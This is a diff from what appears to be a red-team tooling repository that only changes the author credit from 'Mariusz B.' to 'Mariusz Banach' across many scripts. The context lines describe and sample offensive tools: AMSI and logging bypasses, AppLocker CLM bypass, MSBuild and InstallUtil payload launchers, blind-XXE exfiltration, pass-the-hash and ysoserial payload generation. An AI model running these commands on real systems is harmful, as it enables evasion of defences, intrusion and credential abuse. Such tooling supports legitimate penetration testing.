Required Dependencies: None Required Dependencies: None
Optional Dependencies: None Optional Dependencies: None


@ -5,7 +5,7 @@
Attempts to disable Script Block logging within current process using well-known techniques laid out in an unsignatured way. Attempts to disable Script Block logging within current process using well-known techniques laid out in an unsignatured way.
Author: Mariusz B. (@mgeeky) Author: Mariusz Banach (@mgeeky)
License: BSD 3-Clause License: BSD 3-Clause
Required Dependencies: None Required Dependencies: None
Optional Dependencies: None Optional Dependencies: None


@ -5,7 +5,7 @@
files for later processing. This script is compatible with newest PowerView's version, files for later processing. This script is compatible with newest PowerView's version,
from dev branch (as of 2018) that uses Get-Domain*, Find-* (instead of Invoke-*) and others cmdlets. from dev branch (as of 2018) that uses Get-Domain*, Find-* (instead of Invoke-*) and others cmdlets.
Author: Mariusz B. (mgeeky), '18 Author: Mariusz Banach (mgeeky), '18
License: BSD 3-Clause License: BSD 3-Clause
Required Dependencies: PowerSploit's Recon.psm1 Required Dependencies: PowerSploit's Recon.psm1
#> #>


@ -1,7 +1,7 @@
#requires -version 2 #requires -version 2
<# <#
Author: Mariusz B. (@mgeeky) Author: Mariusz Banach (@mgeeky)
License: BSD 3-Clause License: BSD 3-Clause
Required Dependencies: PowerView.ps1 Required Dependencies: PowerView.ps1
Optional Dependencies: None Optional Dependencies: None
@ -12,7 +12,7 @@ function Get-DomainOUTree
<# <#
.SYNOPSIS .SYNOPSIS
Author: Mariusz B. (@mgeeky) Author: Mariusz Banach (@mgeeky)
License: BSD 3-Clause License: BSD 3-Clause
Required Dependencies: PowerView.ps1 Required Dependencies: PowerView.ps1
Optional Dependencies: None Optional Dependencies: None
@ -65,7 +65,7 @@ function Get-NetOUTree
<# <#
.SYNOPSIS .SYNOPSIS
Author: Mariusz B. (@mgeeky) Author: Mariusz Banach (@mgeeky)
License: BSD 3-Clause License: BSD 3-Clause
Required Dependencies: PowerView.ps1 Required Dependencies: PowerView.ps1
Optional Dependencies: None Optional Dependencies: None


@ -8,7 +8,7 @@
PS> . .\Get-UserPasswordEntries.ps1 PS> . .\Get-UserPasswordEntries.ps1
PS> Get-UserPasswordEntries PS> Get-UserPasswordEntries
Mariusz B. / mgeeky Mariusz Banach / mgeeky
#> #>
# This script requires PowerView 3.0 dev branch # This script requires PowerView 3.0 dev branch


@ -15,7 +15,7 @@ PS > .\Bypass-CLM.ps1
(implementation of: @xpn's technique, as documented in:) (implementation of: @xpn's technique, as documented in:)
(https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com/) (https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com/)
Re-implemented, enhanced by: Mariusz B., mgeeky Re-implemented, enhanced by: Mariusz Banach, mgeeky
----- -----
[.] Step 0. Planted DLL files in: [.] Step 0. Planted DLL files in:
@ -180,7 +180,7 @@ C:\Users\IEUser\Desktop\files\video>python generateMSBuildXML.py Show-Msgbox
:: Powershell via MSBuild inline-task XML payload generation script :: Powershell via MSBuild inline-task XML payload generation script
To be used during Red-Team assignments to launch Powershell payloads without using 'powershell.exe' To be used during Red-Team assignments to launch Powershell payloads without using 'powershell.exe'
Mariusz B. / mgeeky, <mb@binary-offensive.com> Mariusz Banach / mgeeky, <mb@binary-offensive.com>
[?] File not recognized as PE/EXE. [?] File not recognized as PE/EXE.
@ -189,7 +189,7 @@ C:\Users\IEUser\Desktop\files\video>python generateMSBuildXML.py Show-Msgbox
<!-- Based on Casey Smith work, Twitter: @subTee --> <!-- Based on Casey Smith work, Twitter: @subTee -->
<!-- Automatically generated using `generateMSBuildXML.py` utility --> <!-- Automatically generated using `generateMSBuildXML.py` utility -->
<!-- by Mariusz B. / mgeeky <mb@binary-offensive.com> --> <!-- by Mariusz Banach / mgeeky <mb@binary-offensive.com> -->
<Target Name="btLDoraXcZV"> <Target Name="btLDoraXcZV">
<hwiJYmWvD /> <hwiJYmWvD />
@ -237,7 +237,7 @@ C:\Users\IEUser\Desktop\files\video>python generateMSBuildXML.py Show-Msgbox.ps1
:: Powershell via MSBuild inline-task XML payload generation script :: Powershell via MSBuild inline-task XML payload generation script
To be used during Red-Team assignments to launch Powershell payloads without using 'powershell.exe' To be used during Red-Team assignments to launch Powershell payloads without using 'powershell.exe'
Mariusz B. / mgeeky, <mb@binary-offensive.com> Mariusz Banach / mgeeky, <mb@binary-offensive.com>
[?] File not recognized as PE/EXE. [?] File not recognized as PE/EXE.
@ -363,7 +363,7 @@ SharpWebServer [29.03.21, 17:55:14] ::1 - "GET /test.txt" - len: 11 (200)
PS D:\> Stracciatella.exe -v -b -x 0x31 -c "ZkNYRVQceV5CRRETeEURRl5DWkIRXVhaVBFQEVJZUENcEBMRChEVdElUUkRFWF5fcl5fRVRJRR9iVEJCWF5fYkVQRVQffVBfVkRQVlR8XlVU" .\Test2.ps1 PS D:\> Stracciatella.exe -v -b -x 0x31 -c "ZkNYRVQceV5CRRETeEURRl5DWkIRXVhaVBFQEVJZUENcEBMRChEVdElUUkRFWF5fcl5fRVRJRR9iVEJCWF5fYkVQRVQffVBfVkRQVlR8XlVU" .\Test2.ps1
:: Stracciatella - Powershell runspace with AMSI and Script Block Logging disabled. :: Stracciatella - Powershell runspace with AMSI and Script Block Logging disabled.
Mariusz B. / mgeeky, '19 <mb@binary-offensive.com> Mariusz Banach / mgeeky, '19 <mb@binary-offensive.com>
[.] Will load script file: '.\Test2.ps1' [.] Will load script file: '.\Test2.ps1'
[+] AMSI Disabled. [+] AMSI Disabled.
@ -395,7 +395,7 @@ This script contains malicious content and has been blocked by your antivirus so
PS D:\> .\Stracciatella.exe -v PS D:\> .\Stracciatella.exe -v
:: Stracciatella - Powershell runspace with AMSI and Script Block Logging disabled. :: Stracciatella - Powershell runspace with AMSI and Script Block Logging disabled.
Mariusz B. / mgeeky, '19 <mb@binary-offensive.com> Mariusz Banach / mgeeky, '19 <mb@binary-offensive.com>
[-] It looks like no script path was given. [-] It looks like no script path was given.
[+] AMSI Disabled. [+] AMSI Disabled.


@ -5,7 +5,7 @@
This script launches many PowerView cmdlets and stores their output This script launches many PowerView cmdlets and stores their output
in Clixml files for later processing. in Clixml files for later processing.
Author: Mariusz B. (mgeeky), '18 Author: Mariusz Banach (mgeeky), '18
License: BSD 3-Clause License: BSD 3-Clause
Required Dependencies: PowerSploit's Recon.psm1 Required Dependencies: PowerSploit's Recon.psm1
#> #>


@ -2,7 +2,7 @@
' Example of downloading a binary file from the URL, saving it to the ' Example of downloading a binary file from the URL, saving it to the
' local filesystem and then launching. ' local filesystem and then launching.
' '
' Mariusz B. / mgeeky, <mb@binary-offensive.com> ' Mariusz Banach / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky) ' (https://github.com/mgeeky)
' '


@ -2,7 +2,7 @@
' Example of downloading a binary file from the URL, saving it to the ' Example of downloading a binary file from the URL, saving it to the
' local filesystem and then launching. ' local filesystem and then launching.
' '
' Mariusz B. / mgeeky, <mb@binary-offensive.com> ' Mariusz Banach / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky) ' (https://github.com/mgeeky)
' '


@ -2,7 +2,7 @@
' Example of dropping an embedded, base64 encoded binary file to the disk, ' Example of dropping an embedded, base64 encoded binary file to the disk,
' decoding it and then launching. ' decoding it and then launching.
' '
' Mariusz B. / mgeeky, <mb@binary-offensive.com> ' Mariusz Banach / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky) ' (https://github.com/mgeeky)
' '


@ -2,7 +2,7 @@
' This script uses WMI class' Win32_Process static method Create to ' This script uses WMI class' Win32_Process static method Create to
' execute given command in a hidden window (ShowWindow = 12). ' execute given command in a hidden window (ShowWindow = 12).
' '
' Mariusz B. / mgeeky, <mb@binary-offensive.com> ' Mariusz Banach / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky) ' (https://github.com/mgeeky)
' '


@ -2,7 +2,7 @@
' This script uses classic WScript.Shell Run method to ' This script uses classic WScript.Shell Run method to
' execute given command in a hidden window (second param = 0) ' execute given command in a hidden window (second param = 0)
' '
' Mariusz B. / mgeeky, <mb@binary-offensive.com> ' Mariusz Banach / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky) ' (https://github.com/mgeeky)
' '


@ -3,7 +3,7 @@
' execute given command in a hidden window via StdIn passed to a dedicated ' execute given command in a hidden window via StdIn passed to a dedicated
' launcher command (powershell.exe in this example). ' launcher command (powershell.exe in this example).
' '
' Mariusz B. / mgeeky, <mb@binary-offensive.com> ' Mariusz Banach / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky) ' (https://github.com/mgeeky)
' '


@ -12,7 +12,7 @@
# - raw Shellcode in a separate thread via CreateThread # - raw Shellcode in a separate thread via CreateThread
# - .NET Assembly via Assembly.Load # - .NET Assembly via Assembly.Load
# #
# Mariusz B. / mgeeky, <mb@binary-offensive.com> # Mariusz Banach / mgeeky, <mb@binary-offensive.com>
# #
import re import re
@ -479,7 +479,7 @@ def getInlineTask(module, payload, _format, apc, targetProcess):
<!-- Based on Casey Smith work, Twitter: @subTee --> <!-- Based on Casey Smith work, Twitter: @subTee -->
<!-- Automatically generated using `generateMSBuildXML.py` utility --> <!-- Automatically generated using `generateMSBuildXML.py` utility -->
<!-- by Mariusz B. / mgeeky <mb@binary-offensive.com> --> <!-- by Mariusz Banach / mgeeky <mb@binary-offensive.com> -->
<Target Name="$taskName"> <Target Name="$taskName">
<$templateName /> <$templateName />
@ -584,7 +584,7 @@ def main(argv):
sys.stderr.write(''' sys.stderr.write('''
:: Powershell via MSBuild inline-task XML payload generation script :: Powershell via MSBuild inline-task XML payload generation script
To be used during Red-Team assignments to launch Powershell payloads without using 'powershell.exe' To be used during Red-Team assignments to launch Powershell payloads without using 'powershell.exe'
Mariusz B. / mgeeky, <mb@binary-offensive.com> Mariusz Banach / mgeeky, <mb@binary-offensive.com>
''') ''')
if len(argv) < 2: if len(argv) < 2:


@ -7,7 +7,7 @@
# script you can quickly instruct Neo4j to mark that principals as owned, which will enrich your # script you can quickly instruct Neo4j to mark that principals as owned, which will enrich your
# future use of BloodHound. # future use of BloodHound.
# #
# Mariusz B. / mgeeky # Mariusz Banach / mgeeky
# #
import sys import sys


@ -3,7 +3,7 @@
<!-- Based on Casey Smith work (https://gist.github.com/subTee/ca477b4d19c885bec05ce238cbad6371), Twitter: @subTee --> <!-- Based on Casey Smith work (https://gist.github.com/subTee/ca477b4d19c885bec05ce238cbad6371), Twitter: @subTee -->
<!-- To be launched like so: cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe task1.xml --> <!-- To be launched like so: cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe task1.xml -->
<!-- Modified by Mariusz B. / mgeeky. --> <!-- Modified by Mariusz Banach / mgeeky. -->
<Target Name="MyLittleInlineTaskName"> <Target Name="MyLittleInlineTaskName">
<MyLittleInlineTask /> <MyLittleInlineTask />


@ -23,7 +23,7 @@ python3 generateRogueDotNet.py --help
:: Rogue .NET Source Code Generation Utility :: Rogue .NET Source Code Generation Utility
To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil. To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil.
Mariusz B. / mgeeky, <mb@binary-offensive.com> Mariusz Banach / mgeeky, <mb@binary-offensive.com>
usage: .\generateRogueDotNet.py [options] <inputFile> usage: .\generateRogueDotNet.py [options] <inputFile>
@ -43,7 +43,7 @@ python3 generateRogueDotNet.py -r notepad64.bin > program.cs
:: Rogue .NET Source Code Generation Utility :: Rogue .NET Source Code Generation Utility
To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil. To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil.
Mariusz B. / mgeeky, <mb@binary-offensive.com> Mariusz Banach / mgeeky, <mb@binary-offensive.com>
[?] File specified as raw Shellcode. [?] File specified as raw Shellcode.


@ -34,7 +34,7 @@
# cmd> %WINDIR%\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll # cmd> %WINDIR%\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll # cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
# #
# Mariusz B. / mgeeky, <mb@binary-offensive.com> # Mariusz Banach / mgeeky, <mb@binary-offensive.com>
# #
import re import re
@ -519,7 +519,7 @@ def getSourceFileContents(
/* /*
Author: Casey Smith, Twitter: @subTee Author: Casey Smith, Twitter: @subTee
Customized by: Mariusz B. / mgeeky, <mb@binary-offensive.com> Customized by: Mariusz Banach / mgeeky, <mb@binary-offensive.com>
License: BSD 3-Clause License: BSD 3-Clause
Step 1: Create Your Strong Name Key -> key.snk Step 1: Create Your Strong Name Key -> key.snk
@ -806,7 +806,7 @@ def main(argv):
sys.stderr.write(''' sys.stderr.write('''
:: Rogue .NET Source Code Generation Utility :: Rogue .NET Source Code Generation Utility
Comes with a few hardcoded C# code templates and an easy wrapper around csc.exe compiler Comes with a few hardcoded C# code templates and an easy wrapper around csc.exe compiler
Mariusz B. / mgeeky, <mb@binary-offensive.com> Mariusz Banach / mgeeky, <mb@binary-offensive.com>
''') ''')
if len(argv) < 2: if len(argv) < 2:


@ -31,7 +31,7 @@
# mysql:x:101:65534:Linux User,,,:/home/mysql:/bin/false # mysql:x:101:65534:Linux User,,,:/home/mysql:/bin/false
# #
# #
# Mariusz B., 2016 # Mariusz Banach, 2016
# #
@ -132,7 +132,7 @@ def parseOptions(argv):
print(''' print('''
:: Blind-XXE attacker's helper backend component :: Blind-XXE attacker's helper backend component
Helps exfiltrate files by abusing out-of-bands XML External Entity vulnerabilities. Helps exfiltrate files by abusing out-of-bands XML External Entity vulnerabilities.
Mariusz B. / mgeeky '16-18, <mb@binary-offensive.com> Mariusz Banach / mgeeky '16-18, <mb@binary-offensive.com>
''') ''')
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <file>') parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <file>')


@ -1,7 +1,7 @@
#!/usr/bin/python #!/usr/bin/python
# #
# Padding Oracle test-cases generator. # Padding Oracle test-cases generator.
# Mariusz B. / mgeeky, 2016 # Mariusz Banach / mgeeky, 2016
# v0.2 # v0.2
# #
# Simple utility that aids the penetration tester when manually testing Padding Oracle condition # Simple utility that aids the penetration tester when manually testing Padding Oracle condition
@ -277,7 +277,7 @@ def hex_dump(data):
def main(): def main():
info('\n\tPadding Oracle test-cases generator') info('\n\tPadding Oracle test-cases generator')
info('\tMariusz B. / mgeeky, 2016\n') info('\tMariusz Banach / mgeeky, 2016\n')
if len(sys.argv) < 2: if len(sys.argv) < 2:
warning('usage: padding-oracle-tests.py <data> [blocksize]') warning('usage: padding-oracle-tests.py <data> [blocksize]')


@ -14,7 +14,7 @@
* to add forced redirection to the target site. * to add forced redirection to the target site.
* *
* Authors: * Authors:
* Mariusz B. / mgeeky * Mariusz Banach / mgeeky
* Jakub M. / unkn0w * Jakub M. / unkn0w
* *
* Version: * Version:


@ -80,7 +80,7 @@ hostname|23:55|~/dev/py-collaborator # python3.7 py-collaborator-server.py -d
:: Cracking the Lens pingback responding server :: Cracking the Lens pingback responding server
Responds to every Out-of-band request correlating them along the way Responds to every Out-of-band request correlating them along the way
Mariusz B. / mgeeky '16-18, <mb@binary-offensive.com> Mariusz Banach / mgeeky '16-18, <mb@binary-offensive.com>
[-] You shall specify all needed MySQL connection data either via program options or config file. [-] You shall specify all needed MySQL connection data either via program options or config file.
[+] Database initialized. [+] Database initialized.


@ -211,7 +211,7 @@ def parseOptions(argv):
print(''' print('''
:: Cracking the Lens pingback responding server :: Cracking the Lens pingback responding server
Responds to every Out-of-band request correlating them along the way Responds to every Out-of-band request correlating them along the way
Mariusz B. / mgeeky '16-18, <mb@binary-offensive.com> Mariusz Banach / mgeeky '16-18, <mb@binary-offensive.com>
''') ''')
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options]') parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options]')


@ -18,7 +18,7 @@
# - jwt # - jwt
# - anytree # - anytree
# #
# Mariusz B., 2018 # Mariusz Banach, 2018
# #
import os import os


@ -26,7 +26,7 @@
# $ ./ysoserial-generator.py -u -b -y ~/tools/ysoserial/ysoserial.jar -s --lhost 192.168.56.1:8000 # $ ./ysoserial-generator.py -u -b -y ~/tools/ysoserial/ysoserial.jar -s --lhost 192.168.56.1:8000
# :: ysoserial payloads generation helper # :: ysoserial payloads generation helper
# Helps generate many variations of payloads to try against vulnerable application. # Helps generate many variations of payloads to try against vulnerable application.
# Mariusz B. / mgeeky '18, <mb@binary-offensive.com> # Mariusz Banach / mgeeky '18, <mb@binary-offensive.com>
# v0.1 # v0.1
# #
# [+] Command within payload: # [+] Command within payload:
@ -55,7 +55,7 @@
# #
# #
# Author: # Author:
# Mariusz B., '18-19 / <mb@binary-offensive.com> # Mariusz Banach, '18-19 / <mb@binary-offensive.com>
# #
import os import os
@ -379,7 +379,7 @@ def parseOptions(argv):
print(''' print('''
:: ysoserial payloads generation helper :: ysoserial payloads generation helper
Helps generate many variations of payloads to try against vulnerable application. Helps generate many variations of payloads to try against vulnerable application.
Mariusz B. / mgeeky '18, <mb@binary-offensive.com> Mariusz Banach / mgeeky '18, <mb@binary-offensive.com>
v{} v{}
'''.format(VERSION)) '''.format(VERSION))


@ -12,7 +12,7 @@
* Compilation: * Compilation:
* C:> g++ GlobalProtectDisable.cpp -o GlobalProtectDisable.exe -static -static-libgcc -static-libstdc++ * C:> g++ GlobalProtectDisable.cpp -o GlobalProtectDisable.exe -static -static-libgcc -static-libstdc++
* *
* Mariusz B. / mgeeky, '18-'20 * Mariusz Banach / mgeeky, '18-'20
**/ **/
#include "windows.h" #include "windows.h"


@ -13,7 +13,7 @@
``` ```
:: findSymbols.py - Finds PE Import/Exports based on supplied filters. :: findSymbols.py - Finds PE Import/Exports based on supplied filters.
Mariusz B. / mgeeky, '21 Mariusz Banach / mgeeky, '21
<mb [at] binary-offensive.com> <mb [at] binary-offensive.com>
usage: .\findSymbols.py [options] <path> usage: .\findSymbols.py [options] <path>
@ -117,7 +117,7 @@ PS> python3 rdpFileUpload.py -v -f certutil README.md
Takes an input file/folder and retypes it into focused RDP session window. Takes an input file/folder and retypes it into focused RDP session window.
That effectively uploads the file into remote host over a RDP channel. That effectively uploads the file into remote host over a RDP channel.
Mariusz B. / mgeeky '20, (@mariuszbit) Mariusz Banach / mgeeky '20, (@mariuszbit)
<mb@binary-offensive.com> <mb@binary-offensive.com>
[+] Will upload file's contents: "README.md" [+] Will upload file's contents: "README.md"


@ -9,7 +9,7 @@
# - module matching name # - module matching name
# - module NOT matching name # - module NOT matching name
# #
# Mariusz B. / mgeeky, '21 # Mariusz Banach / mgeeky, '21
# <mb [at] binary-offensive.com> # <mb [at] binary-offensive.com>
# #
@ -436,7 +436,7 @@ def main():
out(''' out('''
:: findSymbols.py - Finds PE Import/Exports based on supplied filters. :: findSymbols.py - Finds PE Import/Exports based on supplied filters.
Mariusz B. / mgeeky, '21 Mariusz Banach / mgeeky, '21
<mb [at] binary-offensive.com> <mb [at] binary-offensive.com>
''') ''')


@ -23,7 +23,7 @@
# $ ./pth-carpet.py machines.txt pwdump # $ ./pth-carpet.py machines.txt pwdump
# #
# coded by: # coded by:
# Mariusz B., 2016 / mgeeky # Mariusz Banach, 2016 / mgeeky
# version 0.2 # version 0.2
# #
# Should be working on Windows boxes as well as on Linux ones. # Should be working on Windows boxes as well as on Linux ones.
@ -172,7 +172,7 @@ def worker(stopevent, pwdump, machine):
def main(): def main():
global OPTIONS global OPTIONS
print(colored('\n\tPass-The-Hash Carpet Bombing utility\n\tSmall utility trying every provided hash against every specified machine.\n\tMariusz B., 2016\n', 'white', attrs=['bold'])) print(colored('\n\tPass-The-Hash Carpet Bombing utility\n\tSmall utility trying every provided hash against every specified machine.\n\tMariusz Banach, 2016\n', 'white', attrs=['bold']))
parser = argparse.ArgumentParser(add_help = True, description='Pass-The-Hash mass checking tool') parser = argparse.ArgumentParser(add_help = True, description='Pass-The-Hash mass checking tool')
parser.add_argument('rhosts', nargs='?', help='Specifies input file containing list of machines or CIDR notation of hosts') parser.add_argument('rhosts', nargs='?', help='Specifies input file containing list of machines or CIDR notation of hosts')


@ -21,7 +21,7 @@
# - tqdm # - tqdm
# #
# Author: # Author:
# Mariusz B. / mgeeky (@mariuszbit), '20 # Mariusz Banach / mgeeky (@mariuszbit), '20
# <mb [at] binary-offensive.com> # <mb [at] binary-offensive.com>
# #
@ -313,7 +313,7 @@ def parseOptions(argv):
Takes an input file/folder and retypes it into focused RDP session window. Takes an input file/folder and retypes it into focused RDP session window.
That effectively uploads the file into remote host over a RDP channel. That effectively uploads the file into remote host over a RDP channel.
Mariusz B. / mgeeky '20, (@mariuszbit) Mariusz Banach / mgeeky '20, (@mariuszbit)
<mb@binary-offensive.com> <mb@binary-offensive.com>
''') ''')